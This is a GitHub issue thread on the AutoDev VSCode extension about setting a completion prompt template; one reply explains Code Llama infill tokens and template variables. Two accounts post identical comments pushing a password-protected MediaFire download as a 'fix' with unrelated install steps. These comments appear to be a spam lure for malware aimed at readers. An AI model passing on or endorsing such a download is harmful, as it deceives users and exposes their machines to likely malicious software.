### ISSUE TITLE
how to set prompt template for completion?

### ISSUE THREAD

**Issue by keezen** [unit-mesh/auto-dev-vscode#78]
### Before submitting your bug report

- [X] I'm not able to find an [open issue](https://github.com/unit-mesh/auto-dev-vscode/issues?q=is%3Aopen+is%3Aissue) that reports the same bug
- [X] I've seen the [troubleshooting guide](https://vscode.unitmesh.cc/troubleshooting) on the AutoDev Docs

### Relevant environment info

```Markdown
- OS: win11
- AutoDev VSCode: v0.5.2
- IDE:
```

### Description

![屏幕截图 2024-08-27 113728](https://github.com/user-attachments/assets/1e65c96a-0d78-4ce9-aba3-88b72506322a)

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by zhengxs2018** [comment]
Use custom template, follow these steps.

1. Identify the model special tokens.
2. Populate the template with variables like:
   
  Code Llama expects a specific format for infilling code:
  
  ```
  <PRE> {prefix} <SUF>{suffix} <MID>
  ```

   `<PRE>`, `<SUF>` and `<MID>` are guide tokens;`{prefix}` and `{suffix}`  are for extension.

3. These are the available variables in the template:

   - **file_name**：Current file name
   - **language**：Document’s programming language (e.g., Java, JavaScript)
   - **prefix**: Content before the cursor
   - **suffix**: Content after the cursor

**Note:** Formats differ by model; refer to the model introduction page or paper for specifics.

**File:** src/action/providers/AutoDevCodeInlineCompletionProvider.ts 

**Screenshot:**

<img width="886" alt="image" src="https://github.com/user-attachments/assets/50e2b47e-bd0e-45a4-b16a-6fcc69944648">
